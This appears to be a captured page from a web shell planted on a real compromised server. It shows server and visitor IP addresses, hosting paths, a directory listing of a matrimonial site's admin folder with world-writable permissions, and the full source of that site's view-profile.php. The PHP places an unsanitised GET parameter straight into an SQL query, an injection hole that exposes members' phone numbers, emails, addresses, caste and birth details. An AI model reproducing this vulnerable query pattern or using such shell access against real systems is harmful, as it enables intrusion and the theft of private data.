Server IP : 50.63.8.133  /  Your IP : 18.221.79.24
Web Server : Microsoft-IIS/10.0
System : Windows NT P3NWVPWEB032 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : IWPD_10999(xformtec) ( 0)
PHP Version : 5.4.45
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  G:/PleskVhosts/xform.in/madhurivivah.com/admin/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : G:/PleskVhosts/xform.in/madhurivivah.com/admin/view-profile.php
<?php

include('include/config.php');
session_start();





?>


<?php
if (isset($_GET['viewid'])) {
  $viewid = $_GET['viewid'];
  $sql1 = "SELECT * FROM member_profile WHERE member_profile_id LIKE '%$viewid%'";
  $res1 = mysqli_query($con, $sql1);
  $row1 = mysqli_fetch_array($res1);
}


?>








<!DOCTYPE html>
<html lang="en">

<head>
  <!-- Required meta tags -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <!-- Twitter -->
  <meta name="twitter:site" content="">
  <meta name="twitter:creator" content="">
  <meta name="twitter:card" content="s">
  <meta name="twitter:title" content="">
  <meta name="twitter:description" content="">
  <meta name="twitter:image" content="">

  <!-- Facebook -->
  <meta property="og:url" content="">
  <meta property="og:title" content="Bracket">
  <meta property="og:description" content="">

  <meta property="og:image" content="">
  <meta property="og:image:secure_url" content="">
  <meta property="og:image:type" content="image/png">
  <meta property="og:image:width" content="1200">
  <meta property="og:image:height" content="600">

  <!-- Meta -->
  <meta name="description" content="">
  <meta name="author" content="">

  <title>madhuri vivah | View profile</title>

  <!-- vendor css -->
  <link href="lib/font-awesome/css/font-awesome.css" rel="stylesheet">
  <link href="lib/Ionicons/css/ionicons.css" rel="stylesheet">
  <link href="lib/perfect-scrollbar/css/perfect-scrollbar.css" rel="stylesheet">
  <link href="lib/jquery-switchbutton/jquery.switchButton.css" rel="stylesheet">

  <!-- Bracket CSS -->
  <link rel="stylesheet" href="css/bracket.css">
</head>

<body>


  <!-- ########## START: LEFT PANEL ########## -->
  <?php include_once('sidebar.php'); ?>
  <!-- br-sideleft -->
  <!-- ########## END: LEFT PANEL ########## -->

  <!-- ########## START: HEAD PANEL ########## -->
  <?php //include_once('include/header1.php'); 
  ?>
  <!-- br-header -->
  <!-- ########## END: HEAD PANEL ########## -->

  <!-- ########## START: RIGHT PANEL ########## -->
  <?php include_once('right-pannel-sidebar.php'); ?>
  <!-- br-sideright -->
  <!-- ########## END: RIGHT PANEL ########## --->

  <!-- ########## START: MAIN PANEL ########## -->
  <div class="br-mainpanel br-profile-page" id="toprint">






















    <div class="card shadow-base bd-0 rounded-0 widget-4">
      <div class="card-header ht-75">
        <div class="hidden-xs-down">


        </div>
        <div class="tx-24 hidden-xs-down">
          <a href="" class="mg-r-10"><i class="icon ion-ios-email-outline"></i></a>
          <a href=""><i class="icon ion-more"></i></a>
        </div>
      </div><!-- card-header -->
      <div class="card-body">
        <div class="img">


<?php  

if ($row1['profile_photo']) {
  ?>
   <img src="img/profile-photos/<?php echo htmlentities($row1['profile_photo']); ?>" alt="" style="height: 300px ; width:250px;">
  <?php
} else {
  ?>
  <img src="img/image-not-available.png" alt="" style="height: 300px ; width:250px;">
  <?php
}

?>

         




        </div><!-- card-profile-img --><br>
        <h4 class="tx-normal tx-roboto tx-white"><?php echo htmlentities($row1['member_profile_id']); ?></h4>


        <button class="btn btn-warning pd-x-30 pd-y-15 tx-uppercase tx-bold tx-spacing-6 tx-12" id="PrintButton" onclick="window.print()">Print</button>
        <a href="all-profile.php"> <button class="btn btn-warning pd-x-30 pd-y-15 tx-uppercase tx-bold tx-spacing-6 tx-12">back</button></a>


      </div><!-- card-body -->
    </div><!-- card -->

    <div class="ht-70 bg-gray-100 pd-x-20 d-flex align-items-center justify-content-center shadow-base">
      <ul class="nav nav-outline active-info align-items-center flex-row" role="tablist">
        <li class="nav-item"><a class="nav-link active" data-toggle="tab" href="#posts" role="tab">Posts</a></li>

      </ul>
    </div>








    <div class="tab-content br-profile-body">
      <div class="tab-pane fade active show" id="posts">
        <div class="row">
          <div class="col-lg-12">
            <div class="media-list bg-white rounded shadow-base">
              <h3 class="btn btn-oblong btn-primary ">Personal Information</h3>
              <div class="media pd-20 pd-xs-30" style="  border: 2px solid #1c87c9;">
                <div class="media-body mg-l-20">
                  <div class="d-flex justify-content-between mg-b-10">

                    <table class="table table-bordered">
                      <tbody>

                        <tr>

                          <td>GROOM / BRIDE FULL NAME :-

                          </td>

                          <td><?php echo htmlentities($row1['first_name']); ?> &nbsp;<?php echo htmlentities($row1['last_name']); ?></td>


                        </tr>
                        <tr>

                          <td>GENDER :-

                          </td>

                          <td><?php echo htmlentities($row1['gender']); ?></td>


                        </tr>
                        <tr>

                          <td>MARITAL STATUS :-

                          </td>

                          <td><?php echo htmlentities($row1['married_status']); ?></td>


                        </tr>
                        <tr>

                          <td>MOBILE NUMBER :-

                          </td>

                          <td><?php echo htmlentities($row1['mobile_number']); ?></td>


                        </tr>
                        <tr>

                          <td>EMAIL ID :-

                          </td>

                          <td><?php echo htmlentities($row1['email']); ?></td>


                        </tr>
                        <tr>

                          <td>DATE OF BIRTH :-

                          </td>

                          <td><?php echo htmlentities($row1['date_of_birth']); ?></td>


                        </tr>
                        <tr>

                          <td>RELIGION :-

                          </td>

                          <td><?php echo htmlentities($row1['religion']); ?></td>


                        </tr>
                        <tr>

                          <td>CAST :-

                          </td>

                          <td><?php echo htmlentities($row1['cast']); ?></td>


                        </tr>
                        <tr>

                          <td>SUB-CAST :-

                          </td>

                          <td><?php echo htmlentities($row1['sub_cast']); ?></td>


                        </tr>
                        <tr>

                          <td>AGE :-

                          </td>

                          <td><?php echo htmlentities($row1['age']); ?></td>


                        </tr>

                        <tr>

                          <td>HIGHT :-

                          </td>

                          <td><?php echo htmlentities($row1['hieght']); ?></td>


                        </tr>
                        <tr>

                          <td>BLOOD GROUP :-

                          </td>

                          <td><?php echo htmlentities($row1['blood_group']); ?></td>


                        </tr>


                        <tr>

                          <td>COMPLEXION :-

                          </td>

                          <td><?php echo htmlentities($row1['skin_type']); ?></td>


                        </tr>

                        <tr>

                          <td>WEIGHT :-

                          </td>

                          <td><?php echo htmlentities($row1['weight']); ?></td>


                        </tr>
                        <tr>

                          <td>BUILT :-

                          </td>

                          <td><?php echo htmlentities($row1['body_look']); ?></td>


                        </tr>
                        <tr>

                          <td>LENSES/SPECTS :-

                          </td>

                          <td><?php echo htmlentities($row1['lence']); ?></td>


                        </tr>
                        <tr>

                          <td>DIET:-

                          </td>

                          <td><?php echo htmlentities($row1['diet']); ?></td>


                        </tr>


                      </tbody>
                    </table>
                  </div><!-- d-flex -->
                </div><!-- media-body -->
              </div><!-- media -->
            </div><!-- card -->











            <div class="media-list bg-white rounded shadow-base">
              <h3 class="btn btn-oblong btn-primary ">Education Information</h3>
              <div class="media pd-20 pd-xs-30" style="  border: 2px solid #1c87c9;">
                <div class="media-body mg-l-20">
                  <div class="d-flex justify-content-between mg-b-10">

                    <table class="table table-bordered">
                      <tbody>

                        <tr>

                          <td>EDUCATION :-</td>
                          <td><?php echo htmlentities($row1['education']); ?></td>

                        </tr>
                        <tr>

                          <td>JOB/BUSINESS :-</td>
                          <td><?php echo htmlentities($row1['job_work']); ?></td>

                        </tr>
                        <tr>

                          <td>ANNUALY INCOME :-</td>
                          <td><?php echo htmlentities($row1['income']); ?></td>

                        </tr>
                        <tr>

                          <td>HOBBIES :-</td>
                          <td><?php echo htmlentities($row1['hobbies']); ?></td>

                        </tr>
                      </tbody>
                    </table>
                  </div><!-- d-flex -->
                </div><!-- media-body -->
              </div><!-- media -->
            </div><!-- card -->










            <div class="media-list bg-white rounded shadow-base">
              <h3 class="btn btn-oblong btn-primary ">Family Information</h3>
              <div class="media pd-20 pd-xs-30" style="  border: 2px solid #1c87c9;">
                <div class="media-body mg-l-20">
                  <div class="d-flex justify-content-between mg-b-10">

                    <table class="table table-bordered">
                      <tbody>

                        <tr>

                          <td>FATHER NAME :-</td>
                          <td><?php echo htmlentities($row1['father_name']); ?></td>

                        </tr>
                        <tr>

                          <td>MOTHER NAME :-</td>
                          <td><?php echo htmlentities($row1['mother_name']); ?></td>

                        </tr>
                        <tr>

                          <td>HOW MANY BROTHERS :-</td>
                          <td><?php echo htmlentities($row1['all_brothers']); ?></td>

                        </tr>
                        <tr>

                          <td>HOW MANY SISTERS :-</td>
                          <td><?php echo htmlentities($row1['all_sisters']); ?></td>

                        </tr>
                        <tr>

                          <td>FAMILY WORK :-</td>
                          <td><?php echo htmlentities($row1['family_work']); ?></td>

                        </tr>

                      </tbody>
                    </table>
                  </div><!-- d-flex -->
                </div><!-- media-body -->
              </div><!-- media -->
            </div><!-- card -->







            <div class="media-list bg-white rounded shadow-base">
              <h3 class="btn btn-oblong btn-primary ">Horoscope Information</h3>
              <div class="media pd-20 pd-xs-30" style="  border: 2px solid #1c87c9;">
                <div class="media-body mg-l-20">
                  <div class="d-flex justify-content-between mg-b-10">

                    <table class="table table-bordered">
                      <tbody>

                        <tr>

                          <td>GOTRA(गोत्र ) :-</td>
                          <td><?php echo htmlentities($row1['gotra']); ?></td>

                        </tr>
                        <tr>

                          <td>GAN (गण) :-</td>
                          <td><?php echo htmlentities($row1['gan']); ?></td>

                        </tr>
                        <tr>

                          <td>NAKSHATRA(नक्षत्र ) :-</td>
                          <td><?php echo htmlentities($row1['nakashtra']); ?></td>

                        </tr>
                        <tr>

                          <td>RAAS(रास्र ) :-</td>
                          <td><?php echo htmlentities($row1['raas']); ?></td>

                        </tr>
                        <tr>

                          <td>NAADI (नाडी) :--</td>
                          <td><?php echo htmlentities($row1['naadi']); ?></td>

                        </tr>
                        <tr>

                          <td>CHARAN (चरण) :-</td>
                          <td><?php echo htmlentities($row1['charan']); ?></td>

                        </tr>
                        <tr>

                          <td>BIRTH PLACE:-</td>
                          <td><?php echo htmlentities($row1['birth_place']); ?></td>

                        </tr>
                        <tr>

                          <td>BIRTH TIME:-</td>
                          <td><?php echo htmlentities($row1['birth_time']); ?></td>

                        </tr>
                      </tbody>
                    </table>
                  </div><!-- d-flex -->
                </div><!-- media-body -->
              </div><!-- media -->
            </div><!-- card -->











            <div class="media-list bg-white rounded shadow-base">
              <h3 class="btn btn-oblong btn-primary ">Address Information</h3>
              <div class="media pd-20 pd-xs-30" style="  border: 2px solid #1c87c9;">
                <div class="media-body mg-l-20">
                  <div class="d-flex justify-content-between mg-b-10">

                    <table class="table table-bordered">
                      <tbody>

                        <tr>

                          <td>CURRENT ADDRESS :-</td>
                          <td><?php echo htmlentities($row1['currant_address']); ?></td>

                        </tr>
                        <tr>

                          <td>PARMANENT ADDRESS :-</td>
                          <td><?php echo htmlentities($row1['permanant_address']); ?></td>

                        </tr>
                        <tr>

                          <td>STATE :-</td>
                          <td><?php echo htmlentities($row1['state']); ?></td>

                        </tr>
                        <tr>

                          <td>DISTRICT :-</td>
                          <td><?php echo htmlentities($row1['district']); ?></td>

                        </tr>



                      </tbody>
                    </table>
                  </div><!-- d-flex -->
                </div><!-- media-body -->
              </div><!-- media -->
            </div><!-- card -->








            <div class="media-list bg-white rounded shadow-base">
              <h3 class="btn btn-oblong btn-primary">EXPECTATION</h3>
              <div class="media pd-20 pd-xs-30" style="  border: 2px solid #1c87c9;">
                <div class="media-body mg-l-20">
                  <div class="d-flex justify-content-between mg-b-10">




                    <p class="form-control"><?php echo htmlentities($row1['expectation']); ?></p>





                  </div><!-- d-flex -->
                  <p>मी संस्थेचे माहितीपत्रक वाचले असून त्यातील सूचना व नियम मला मान्य आहेत वरील भरलेली संपूर्ण माहिती खरी असून त्यास मी संपूर्ण जबाबदार आहे</p>
                </div><!-- media-body -->
              </div><!-- media -->
            </div><!-- card -->
            <div class="media-list bg-white rounded shadow-base">
              <h3 class="btn btn-oblong btn-primary">Additional Information</h3>
              <div class="media pd-20 pd-xs-30" style="  border: 2px solid #1c87c9;">
                <div class="media-body mg-l-20">
                  <div class="d-flex justify-content-between mg-b-10">




                    <p class="form-control"><?php echo htmlentities($row1['ads_info']); ?></p>





                  </div><!-- d-flex -->

                </div><!-- media-body -->
              </div><!-- media -->
            </div><!-- card -->













          </div><!-- col-lg-8 -->
        </div><!-- row -->
      </div><!-- tab-pane -->


    </div><!-- tab-pane -->










  </div><!-- br-pagebody -->





  <!-- ########## END: MAIN PANEL ########## -->

  <script src="lib/jquery/jquery.js"></script>
  <script src="lib/popper.js/popper.js"></script>
  <script src="lib/bootstrap/bootstrap.js"></script>
  <script src="lib/perfect-scrollbar/js/perfect-scrollbar.jquery.js"></script>
  <script src="lib/moment/moment.js"></script>
  <script src="lib/jquery-ui/jquery-ui.js"></script>
  <script src="lib/jquery-switchbutton/jquery.switchButton.js"></script>
  <script src="lib/peity/jquery.peity.js"></script>

  <script src="js/bracket.js"></script>
  <script>
    function printpart() {
      var printwin = window.open("");
      printwin.document.write(document.getElementById("toprint").innerHTML);
      printwin.stop();
      printwin.print();
      printwin.close();
    }
  </script>

</body>

</html>
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
April 17 2025 11:26:52
0 / 0
0777
about-images
--
November 02 2023 07:45:20
0 / 0
0777
blog-images
--
June 28 2024 08:28:09
0 / 0
0777
css
--
November 02 2023 07:45:26
0 / 0
0777
fedexexpress
--
March 05 2025 09:40:57
0 / 0
0777
gallary
--
March 04 2025 04:45:47
0 / 0
0777
img
--
December 01 2023 20:53:14
0 / 0
0777
include
--
November 02 2023 07:48:17
0 / 0
0777
js
--
November 02 2023 07:48:21
0 / 0
0777
lib
--
November 02 2023 07:48:29
0 / 0
0777
slider-images
--
March 04 2025 04:43:23
0 / 0
0777
story
--
April 21 2025 08:34:08
0 / 0
0777
.htaccess
0.772 KB
September 22 2023 07:07:25
0 / 0
0666
404.php
2.678 KB
June 05 2022 08:00:12
0 / 0
0666
a.html
1.987 KB
May 14 2022 21:22:34
0 / 0
0666
active-profile.php
12.279 KB
October 16 2022 10:56:50
0 / 0
0666
add-about.php
12.315 KB
September 16 2022 00:34:50
0 / 0
0666
add-blog-categori.php
9.562 KB
May 05 2022 07:09:46
0 / 0
0666
add-blog.php
10.853 KB
December 17 2022 23:04:14
0 / 0
0666
add-cast.php
8.957 KB
May 16 2022 03:00:44
0 / 0
0666
add-contact.php
13.006 KB
May 20 2022 08:40:24
0 / 0
0666
add-district.php
10.146 KB
May 17 2022 01:12:58
0 / 0
0666
add-faq.php
8.505 KB
May 05 2022 06:22:36
0 / 0
0666
add-gallary.php
9.605 KB
May 21 2022 09:06:34
0 / 0
0666
add-marrital-status.php
9.14 KB
May 16 2022 03:01:16
0 / 0
0666
add-membership.php
11.767 KB
September 13 2022 18:57:22
0 / 0
0666
add-slider.php
11.935 KB
May 19 2022 12:21:18
0 / 0
0666
add-state.php
8.97 KB
May 16 2022 03:01:02
0 / 0
0666
add-story.php
10.093 KB
October 13 2023 11:22:07
0 / 0
0666
add-term-condition.php
9.177 KB
October 01 2022 21:05:22
0 / 0
0666
add-testimonial.php
8.584 KB
May 05 2022 06:08:30
0 / 0
0666
add-why-choose-us.php
8.601 KB
May 05 2022 06:03:26
0 / 0
0666
all-profile.php
17.09 KB
August 26 2023 10:19:28
0 / 0
0666
all-user.php
11.056 KB
November 03 2022 22:28:50
0 / 0
0666
blog-category.php
8.83 KB
May 05 2022 07:37:48
0 / 0
0666
blog.php
13.785 KB
November 18 2022 23:35:58
0 / 0
0666
cast.php
12.35 KB
October 01 2022 19:48:24
0 / 0
0666
change-password.php
10.564 KB
November 03 2022 19:20:22
0 / 0
0666
check.php
0.828 KB
April 08 2022 21:08:48
0 / 0
0666
contact.php
13.168 KB
June 05 2022 21:14:38
0 / 0
0666
dashboard.php
15.579 KB
January 21 2023 23:49:58
0 / 0
0666
deactive-profile.php
12.27 KB
October 16 2022 11:01:56
0 / 0
0666
district.php
13.17 KB
May 16 2022 23:58:28
0 / 0
0666
edit-blog-categori.php
9.544 KB
May 05 2022 17:00:06
0 / 0
0666
edit-blog.php
10.461 KB
November 18 2022 23:41:02
0 / 0
0666
edit-cast.php
9.633 KB
October 01 2022 19:55:26
0 / 0
0666
edit-membership.php
12.694 KB
November 16 2022 18:11:08
0 / 0
0666
edit-profile.php
56.25 KB
December 28 2022 19:24:18
0 / 0
0666
edit-slider.php
8.531 KB
May 05 2022 04:47:24
0 / 0
0666
edit-story.php
8.363 KB
May 05 2022 00:39:56
0 / 0
0666
error_log
12.08 MB
April 20 2024 09:18:28
0 / 0
0666
forgot-password.php
2.689 KB
November 03 2022 18:11:54
0 / 0
0666
gallary.php
13.888 KB
September 04 2023 12:32:55
0 / 0
0666
index.php
4.139 KB
September 14 2023 07:18:03
0 / 0
0666
login.php
3.094 KB
April 01 2022 23:53:28
0 / 0
0666
logout.php
0.106 KB
June 24 2022 19:14:42
0 / 0
0666
marrital-status.php
12.444 KB
June 24 2022 19:26:04
0 / 0
0666
memberdata.php
1.511 KB
June 14 2024 17:59:53
0 / 0
0666
membership.php
13.21 KB
November 16 2022 17:50:54
0 / 0
0666
registration.php
6.104 KB
April 02 2022 00:50:22
0 / 0
0666
right-pannel-sidebar.php
21.975 KB
May 04 2022 23:54:42
0 / 0
0666
sidebar.php
7.43 KB
September 05 2023 05:45:01
0 / 0
0666
slider.php
12.592 KB
June 24 2022 19:32:18
0 / 0
0666
state.php
12.274 KB
June 24 2022 19:25:20
0 / 0
0666
successstories.php
10.01 KB
October 13 2023 11:20:11
0 / 0
0666
userdata.php
1.496 KB
June 14 2024 17:59:52
0 / 0
0666
view-profile.php
18.215 KB
August 26 2023 10:16:27
0 / 0
0666
view-user-profile.php
7.743 KB
June 24 2022 20:24:30
0 / 0
0666